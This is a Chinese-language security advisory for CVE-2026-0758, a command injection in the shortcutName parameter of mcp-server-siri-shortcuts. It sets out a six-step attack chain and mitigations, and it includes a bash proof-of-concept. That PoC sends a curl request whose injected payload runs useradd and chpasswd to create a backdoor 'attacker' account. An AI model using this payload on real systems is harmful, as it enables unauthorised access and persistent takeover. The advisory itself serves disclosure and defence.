CVE-2026-0758: mcp-server-siri-shortcuts shortcutName命令注入权限提升漏洞

漏洞信息

漏洞编号

CVE-2026-0758

漏洞类型

命令注入

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

mcp-server-siri-shortcuts

漏洞概述

CVE-2026-0758是mcp-server-siri-shortcuts中的一个高危命令注入漏洞，CVSS评分7.8。该漏洞允许本地攻击者在受影响系统上进行权限提升。攻击者需要首先获得在目标系统上执行低权限代码的能力才能利用此漏洞。漏洞存在于shortcutName参数处理过程中，由于缺乏对用户输入字符串的正确验证就直接用于系统调用，导致攻击者可以通过构造恶意输入执行任意系统命令。此漏洞可使攻击者以服务账户上下文提升权限并执行任意代码，对系统机密性、完整性和可用性造成严重影响。

技术细节

该漏洞的根本原因在于mcp-server-siri-shortcuts应用对shortcutName参数的处理机制。应用程序在接受用户输入的shortcutName参数后，未对其进行充分的安全验证和过滤，直接将用户提供的字符串拼接到系统调用命令中执行。这种不安全的设计使得攻击者可以通过在shortcutName参数中注入恶意构造的命令字符串来实现任意系统命令执行。攻击者利用此漏洞可以绕过正常的权限检查，以服务账户的高权限身份执行系统命令，从而实现权限提升。由于攻击向量为本地且需要低权限认证，攻击者需要预先获得目标系统的低权限代码执行能力，但一旦成功利用即可获得完全的系统控制权。

攻击链分析

STEP 1

步骤1：初始访问

攻击者获得目标系统的低权限代码执行能力，可以是本地用户账户或通过其他漏洞获取的低权限shell

STEP 2

步骤2：识别漏洞

攻击者识别出mcp-server-siri-shortcuts服务正在运行，并发现shortcutName参数存在命令注入漏洞

STEP 3

步骤3：构造恶意Payload

攻击者构造包含恶意系统命令的shortcutName参数，如注入useradd、chpasswd等命令创建后门账户

STEP 4

步骤4：触发漏洞

通过API或相关接口发送构造的恶意请求，触发应用程序执行注入的命令

STEP 5

步骤5：权限提升

注入的命令以服务账户的高权限身份执行，攻击者成功创建后门用户或直接执行恶意代码

STEP 6

步骤6：持久化控制

攻击者通过后门账户或植入的恶意代码建立持久化访问，完全控制目标系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2026-0758 PoC - Command Injection in shortcutName parameter
# This PoC demonstrates the command injection vulnerability in mcp-server-siri-shortcuts

# Target: mcp-server-siri-shortcuts service
TARGET_HOST="localhost"
TARGET_PORT="8080"

# Malicious payload - injects command to create a backdoor user
# The shortcutName parameter is vulnerable to command injection
PAYLOAD="test'; useradd -m -s /bin/bash attacker; echo 'attacker:password' | chpasswd; #"

# Send malicious request to trigger command injection
echo "Sending exploit payload..."
curl -X POST "http://${TARGET_HOST}:${TARGET_PORT}/api/shortcuts" \
  -H "Content-Type: application/json" \
  -d "{\"shortcutName\": \"${PAYLOAD}\", \"action\": \"execute\"}"

echo ""
echo "If exploitation successful, a new user 'attacker' has been created."
echo "Attacker can now escalate privileges using: su - attacker"

影响范围

mcp-server-siri-shortcuts < 修复版本

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1) 限制mcp-server-siri-shortcuts服务的网络访问，仅允许受信任的IP地址连接；2) 监控服务日志，关注异常的shortcutName参数值和系统命令执行记录；3) 实施应用层输入过滤，拒绝包含特殊字符的shortcutName请求；4) 考虑使用容器化或沙箱环境隔离服务，限制潜在攻击影响范围；5) 定期审计系统账户和权限配置，及时发现异常账户创建行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0758
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0758
3 Details https://www.cvedetails.com/cve/CVE-2026-0758/
4 VulDB https://vuldb.com/cve/CVE-2026-0758
5 Link https://www.zerodayinitiative.com/advisories/ZDI-26-024/